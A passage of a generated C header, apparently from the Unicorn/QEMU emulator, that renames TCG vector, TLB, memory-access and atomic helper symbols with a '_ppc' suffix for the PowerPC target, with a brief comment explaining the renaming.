tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_ppc #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_ppc #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_ppc #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_ppc #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_ppc #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_ppc #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_ppc #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_ppc #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_ppc #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_ppc #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_ppc #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_ppc #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_ppc #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_ppc #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_ppc #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_ppc #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_ppc #define tcg_gen_atomic_add_fetch_i32 
tcg_gen_atomic_add_fetch_i32_ppc #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_ppc #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_ppc #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_ppc #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_ppc #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_ppc #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_ppc #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_ppc #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_ppc #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_ppc #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_ppc #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_ppc #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_ppc #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_ppc #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_ppc #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_ppc #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_ppc #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_ppc #define simd_desc simd_desc_ppc #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_ppc #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_ppc #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_ppc #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_ppc #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_ppc #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_ppc #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_ppc #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_ppc #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_ppc #define tcg_gen_gvec_2 tcg_gen_gvec_2_ppc #define tcg_gen_gvec_2i tcg_gen_gvec_2i_ppc #define tcg_gen_gvec_2s tcg_gen_gvec_2s_ppc #define tcg_gen_gvec_3 tcg_gen_gvec_3_ppc #define tcg_gen_gvec_3i tcg_gen_gvec_3i_ppc #define tcg_gen_gvec_4 tcg_gen_gvec_4_ppc #define tcg_gen_gvec_mov tcg_gen_gvec_mov_ppc #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_ppc #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_ppc #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_ppc #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_ppc #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_ppc #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_ppc #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_ppc #define tcg_gen_gvec_not tcg_gen_gvec_not_ppc #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_ppc #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_ppc #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_ppc #define tcg_gen_gvec_add tcg_gen_gvec_add_ppc #define tcg_gen_gvec_adds tcg_gen_gvec_adds_ppc #define tcg_gen_gvec_addi tcg_gen_gvec_addi_ppc #define tcg_gen_gvec_subs tcg_gen_gvec_subs_ppc #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_ppc #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_ppc #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_ppc #define tcg_gen_gvec_sub tcg_gen_gvec_sub_ppc #define tcg_gen_gvec_mul tcg_gen_gvec_mul_ppc #define tcg_gen_gvec_muls tcg_gen_gvec_muls_ppc #define tcg_gen_gvec_muli tcg_gen_gvec_muli_ppc #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_ppc #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_ppc #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_ppc #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_ppc #define tcg_gen_gvec_smin tcg_gen_gvec_smin_ppc #define tcg_gen_gvec_umin tcg_gen_gvec_umin_ppc #define tcg_gen_gvec_smax tcg_gen_gvec_smax_ppc #define tcg_gen_gvec_umax tcg_gen_gvec_umax_ppc #define tcg_gen_vec_neg8_i64 
tcg_gen_vec_neg8_i64_ppc #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_ppc #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_ppc #define tcg_gen_gvec_neg tcg_gen_gvec_neg_ppc #define tcg_gen_gvec_abs tcg_gen_gvec_abs_ppc #define tcg_gen_gvec_and tcg_gen_gvec_and_ppc #define tcg_gen_gvec_or tcg_gen_gvec_or_ppc #define tcg_gen_gvec_xor tcg_gen_gvec_xor_ppc #define tcg_gen_gvec_andc tcg_gen_gvec_andc_ppc #define tcg_gen_gvec_orc tcg_gen_gvec_orc_ppc #define tcg_gen_gvec_nand tcg_gen_gvec_nand_ppc #define tcg_gen_gvec_nor tcg_gen_gvec_nor_ppc #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_ppc #define tcg_gen_gvec_ands tcg_gen_gvec_ands_ppc #define tcg_gen_gvec_andi tcg_gen_gvec_andi_ppc #define tcg_gen_gvec_xors tcg_gen_gvec_xors_ppc #define tcg_gen_gvec_xori tcg_gen_gvec_xori_ppc #define tcg_gen_gvec_ors tcg_gen_gvec_ors_ppc #define tcg_gen_gvec_ori tcg_gen_gvec_ori_ppc #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_ppc #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_ppc #define tcg_gen_gvec_shli tcg_gen_gvec_shli_ppc #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_ppc #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_ppc #define tcg_gen_gvec_shri tcg_gen_gvec_shri_ppc #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_ppc #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_ppc #define tcg_gen_gvec_sari tcg_gen_gvec_sari_ppc #define tcg_gen_gvec_shls tcg_gen_gvec_shls_ppc #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_ppc #define tcg_gen_gvec_sars tcg_gen_gvec_sars_ppc #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_ppc #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_ppc #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_ppc #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_ppc #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_ppc #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_ppc #define vec_gen_2 vec_gen_2_ppc #define vec_gen_3 vec_gen_3_ppc #define vec_gen_4 vec_gen_4_ppc #define tcg_gen_mov_vec tcg_gen_mov_vec_ppc #define tcg_const_zeros_vec tcg_const_zeros_vec_ppc #define tcg_const_ones_vec tcg_const_ones_vec_ppc #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_ppc #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_ppc #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_ppc #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_ppc #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_ppc #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_ppc #define tcg_gen_dupi_vec tcg_gen_dupi_vec_ppc #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_ppc #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_ppc #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_ppc #define tcg_gen_ld_vec tcg_gen_ld_vec_ppc #define tcg_gen_st_vec tcg_gen_st_vec_ppc #define tcg_gen_stl_vec tcg_gen_stl_vec_ppc #define tcg_gen_and_vec tcg_gen_and_vec_ppc #define tcg_gen_or_vec tcg_gen_or_vec_ppc #define tcg_gen_xor_vec tcg_gen_xor_vec_ppc #define tcg_gen_andc_vec tcg_gen_andc_vec_ppc #define tcg_gen_orc_vec tcg_gen_orc_vec_ppc #define tcg_gen_nand_vec tcg_gen_nand_vec_ppc #define tcg_gen_nor_vec tcg_gen_nor_vec_ppc #define tcg_gen_eqv_vec tcg_gen_eqv_vec_ppc #define tcg_gen_not_vec tcg_gen_not_vec_ppc #define tcg_gen_neg_vec tcg_gen_neg_vec_ppc #define tcg_gen_abs_vec tcg_gen_abs_vec_ppc #define tcg_gen_shli_vec tcg_gen_shli_vec_ppc #define tcg_gen_shri_vec tcg_gen_shri_vec_ppc #define tcg_gen_sari_vec tcg_gen_sari_vec_ppc #define tcg_gen_cmp_vec tcg_gen_cmp_vec_ppc #define tcg_gen_add_vec tcg_gen_add_vec_ppc #define tcg_gen_sub_vec tcg_gen_sub_vec_ppc #define tcg_gen_mul_vec tcg_gen_mul_vec_ppc #define tcg_gen_ssadd_vec 
tcg_gen_ssadd_vec_ppc #define tcg_gen_usadd_vec tcg_gen_usadd_vec_ppc #define tcg_gen_sssub_vec tcg_gen_sssub_vec_ppc #define tcg_gen_ussub_vec tcg_gen_ussub_vec_ppc #define tcg_gen_smin_vec tcg_gen_smin_vec_ppc #define tcg_gen_umin_vec tcg_gen_umin_vec_ppc #define tcg_gen_smax_vec tcg_gen_smax_vec_ppc #define tcg_gen_umax_vec tcg_gen_umax_vec_ppc #define tcg_gen_shlv_vec tcg_gen_shlv_vec_ppc #define tcg_gen_shrv_vec tcg_gen_shrv_vec_ppc #define tcg_gen_sarv_vec tcg_gen_sarv_vec_ppc #define tcg_gen_shls_vec tcg_gen_shls_vec_ppc #define tcg_gen_shrs_vec tcg_gen_shrs_vec_ppc #define tcg_gen_sars_vec tcg_gen_sars_vec_ppc #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_ppc #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_ppc #define tb_htable_lookup tb_htable_lookup_ppc #define tb_set_jmp_target tb_set_jmp_target_ppc #define cpu_exec cpu_exec_ppc #define cpu_loop_exit_noexc cpu_loop_exit_noexc_ppc #define cpu_reloading_memory_map cpu_reloading_memory_map_ppc #define cpu_loop_exit cpu_loop_exit_ppc #define cpu_loop_exit_restore cpu_loop_exit_restore_ppc #define cpu_loop_exit_atomic cpu_loop_exit_atomic_ppc #define tlb_init tlb_init_ppc #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_ppc #define tlb_flush tlb_flush_ppc #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_ppc #define tlb_flush_all_cpus tlb_flush_all_cpus_ppc #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_ppc #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_ppc #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_ppc #define tlb_flush_page tlb_flush_page_ppc #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_ppc #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_ppc #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_ppc #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_ppc #define tlb_protect_code tlb_protect_code_ppc #define tlb_unprotect_code tlb_unprotect_code_ppc #define tlb_reset_dirty tlb_reset_dirty_ppc #define tlb_set_dirty tlb_set_dirty_ppc #define tlb_set_page_with_attrs tlb_set_page_with_attrs_ppc #define tlb_set_page tlb_set_page_ppc #define get_page_addr_code_hostp get_page_addr_code_hostp_ppc #define get_page_addr_code get_page_addr_code_ppc #define probe_access probe_access_ppc #define tlb_vaddr_to_host tlb_vaddr_to_host_ppc #define helper_ret_ldub_mmu helper_ret_ldub_mmu_ppc #define helper_le_lduw_mmu helper_le_lduw_mmu_ppc #define helper_be_lduw_mmu helper_be_lduw_mmu_ppc #define helper_le_ldul_mmu helper_le_ldul_mmu_ppc #define helper_be_ldul_mmu helper_be_ldul_mmu_ppc #define helper_le_ldq_mmu helper_le_ldq_mmu_ppc #define helper_be_ldq_mmu helper_be_ldq_mmu_ppc #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_ppc #define helper_le_ldsw_mmu helper_le_ldsw_mmu_ppc #define helper_be_ldsw_mmu helper_be_ldsw_mmu_ppc #define helper_le_ldsl_mmu helper_le_ldsl_mmu_ppc #define helper_be_ldsl_mmu helper_be_ldsl_mmu_ppc #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_ppc #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_ppc #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_ppc #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_ppc #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_ppc #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_ppc #define cpu_ldub_data_ra cpu_ldub_data_ra_ppc #define cpu_ldsb_data_ra cpu_ldsb_data_ra_ppc #define cpu_lduw_data_ra cpu_lduw_data_ra_ppc #define cpu_ldsw_data_ra cpu_ldsw_data_ra_ppc #define cpu_ldl_data_ra cpu_ldl_data_ra_ppc #define cpu_ldq_data_ra cpu_ldq_data_ra_ppc 
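/*
 * Note on this header (a descriptive summary, not part of the generated
 * output): these defines rename QEMU-internal symbols with a _ppc suffix
 * so that several target back ends can be linked into a single Unicorn
 * library without duplicate-symbol collisions. For example,
 *
 *     #define cpu_ldub_data cpu_ldub_data_ppc
 *
 * makes every reference to cpu_ldub_data in PowerPC-target code resolve
 * to the target-specific cpu_ldub_data_ppc at link time.
 */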
#define cpu_ldub_data cpu_ldub_data_ppc #define cpu_ldsb_data cpu_ldsb_data_ppc #define cpu_lduw_data cpu_lduw_data_ppc #define cpu_ldsw_data cpu_ldsw_data_ppc #define cpu_ldl_data cpu_ldl_data_ppc #define cpu_ldq_data cpu_ldq_data_ppc #define helper_ret_stb_mmu helper_ret_stb_mmu_ppc #define helper_le_stw_mmu helper_le_stw_mmu_ppc #define helper_be_stw_mmu helper_be_stw_mmu_ppc #define helper_le_stl_mmu helper_le_stl_mmu_ppc #define helper_be_stl_mmu helper_be_stl_mmu_ppc #define helper_le_stq_mmu helper_le_stq_mmu_ppc #define helper_be_stq_mmu helper_be_stq_mmu_ppc #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_ppc #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_ppc #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_ppc #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_ppc #define cpu_stb_data_ra cpu_stb_data_ra_ppc #define cpu_stw_data_ra cpu_stw_data_ra_ppc #define cpu_stl_data_ra cpu_stl_data_ra_ppc #define cpu_stq_data_ra cpu_stq_data_ra_ppc #define cpu_stb_data cpu_stb_data_ppc #define cpu_stw_data cpu_stw_data_ppc #define cpu_stl_data cpu_stl_data_ppc #define cpu_stq_data cpu_stq_data_ppc #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_ppc #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_ppc #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_ppc #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_ppc #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_ppc #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_ppc #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_ppc #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_ppc #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_ppc #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_ppc #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_ppc #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_ppc #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_ppc #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_ppc #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_ppc #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_ppc #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_ppc #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_ppc #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_ppc #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_ppc #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_ppc #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_ppc #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_ppc #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_ppc #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_ppc #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_ppc #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_ppc #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_ppc #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_ppc #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_ppc #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_ppc #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_ppc #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_ppc #define helper_atomic_umin_fetchw_le_mmu 
helper_atomic_umin_fetchw_le_mmu_ppc #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_ppc #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_ppc #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_ppc #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_ppc #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_ppc #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_ppc #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_ppc #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_ppc #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_ppc #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_ppc #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_ppc #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_ppc #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_ppc #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_ppc #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_ppc #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_ppc #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_ppc #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_ppc #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_ppc #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_ppc #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_ppc #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_ppc #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_ppc #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_ppc #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_ppc #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_ppc #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_ppc #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_ppc #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_ppc #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_ppc #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_ppc #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_ppc #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_ppc #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_ppc #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_ppc #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_ppc #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_ppc #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_ppc #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_ppc #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_ppc #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_ppc #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_ppc #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_ppc #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_ppc #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_ppc #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_ppc #define 
helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_ppc #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_ppc #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_ppc #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_ppc #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_ppc #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_ppc #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_ppc #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_ppc #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_ppc #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_ppc #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_ppc #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_ppc #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_ppc #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_ppc #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_ppc #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_ppc #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_ppc #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_ppc #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_ppc #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_ppc #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_ppc #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_ppc #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_ppc #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_ppc #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_ppc #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_ppc #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_ppc #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_ppc #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_ppc #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_ppc #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_ppc #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_ppc #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_ppc #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_ppc #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_ppc #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_ppc #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_ppc #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_ppc #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_ppc #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_ppc #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_ppc #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_ppc #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_ppc #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_ppc #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_ppc #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_ppc #define helper_atomic_cmpxchgb 
helper_atomic_cmpxchgb_ppc #define helper_atomic_xchgb helper_atomic_xchgb_ppc #define helper_atomic_fetch_addb helper_atomic_fetch_addb_ppc #define helper_atomic_fetch_andb helper_atomic_fetch_andb_ppc #define helper_atomic_fetch_orb helper_atomic_fetch_orb_ppc #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_ppc #define helper_atomic_add_fetchb helper_atomic_add_fetchb_ppc #define helper_atomic_and_fetchb helper_atomic_and_fetchb_ppc #define helper_atomic_or_fetchb helper_atomic_or_fetchb_ppc #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_ppc #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_ppc #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_ppc #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_ppc #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_ppc #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_ppc #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_ppc #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_ppc #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_ppc #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_ppc #define 